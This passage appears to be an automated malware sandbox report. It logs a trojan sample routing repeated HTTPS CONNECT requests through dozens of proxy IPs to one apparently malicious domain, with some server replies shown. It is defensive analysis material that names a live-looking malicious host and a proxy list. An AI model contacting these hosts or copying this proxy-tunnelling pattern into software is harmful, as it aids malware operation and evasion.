                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1851192.168.2.85534349.228.131.16950005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.915219069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1852192.168.2.854685141.94.174.6479135828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.915219069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1853192.168.2.855153162.240.22.184434945828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.933989048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.992027044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.085473061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:54.101033926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:06.100967884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:18.206414938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1854192.168.2.854693178.159.39.15381185828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.934166908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.885584116 CET132INHTTP/1.1 503 Too many open connections
                                                                                Content-Type: text/plain
                                                                                Connection: close
                                                                                Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                Data Ascii: Maximum number of open connections reached.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1855192.168.2.854941142.54.236.9741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.941608906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1856192.168.2.855347103.35.153.7480805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:41.941695929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1857192.168.2.855119202.58.199.22956785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.086652994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1858192.168.2.855108185.245.38.20041455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.109960079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1859192.168.2.8553725.9.98.14236295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.130435944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1860192.168.2.855367190.43.92.1209995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.140115976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.477184057 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1861192.168.2.85537145.11.95.16550405828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.143556118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.465712070 CET39INHTTP/1.0 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1862192.168.2.852291142.93.66.245259795828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.143750906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.194974899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.194880962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1863192.168.2.855362103.48.69.113845828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.144114971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.967092991 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1864192.168.2.85512391.241.21.23798125828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.144180059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.195158958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.194890022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:54.288635969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1865192.168.2.8553745.44.42.82108085828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.174096107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1866192.168.2.852256178.33.162.89506825828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.186080933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.195008039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.194966078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:54.288573980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:06.288459063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:18.288460016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1867192.168.2.85472051.75.206.209805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.225589037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.288628101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.398030043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:54.457815886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:06.460422993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:18.616606951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1868192.168.2.852223162.214.165.203805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.225589037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.382282019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1869192.168.2.852283167.99.39.82134865828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.226685047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.288667917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1870192.168.2.85231479.143.187.5817305828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.228130102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.288683891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1871192.168.2.852338193.57.139.23331285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.247041941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.288765907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1872192.168.2.852108156.200.116.6819815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.286387920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.288834095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.398047924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:54.457875013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:06.460432053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:18.617108107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:30.632251024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:54.647892952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1873192.168.2.85529550.63.13.319385828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.286798954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.382496119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1874192.168.2.85541193.190.24.1194435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.301141977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1875192.168.2.855395104.19.83.128805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.304678917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.392596960 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:42 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1876192.168.2.8523408.218.148.14431285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.335402966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.466825008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1877192.168.2.85524945.167.124.309995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.371989012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.466933012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.584197998 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1878192.168.2.855287109.123.254.43518565828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.382050991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1879192.168.2.855427218.145.131.1824435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.391439915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1880192.168.2.855396193.239.56.8480815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.391555071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1881192.168.2.854927184.185.105.10544815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.412991047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1882192.168.2.85526736.67.77.4131285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.416721106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1883192.168.2.855422172.67.182.126805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.416759968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.504695892 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:42 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1884192.168.2.855407212.31.100.13841535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.426110029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1885192.168.2.855414142.54.236.9741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.439361095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1886192.168.2.855245103.48.69.113825828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.439412117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.430496931 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
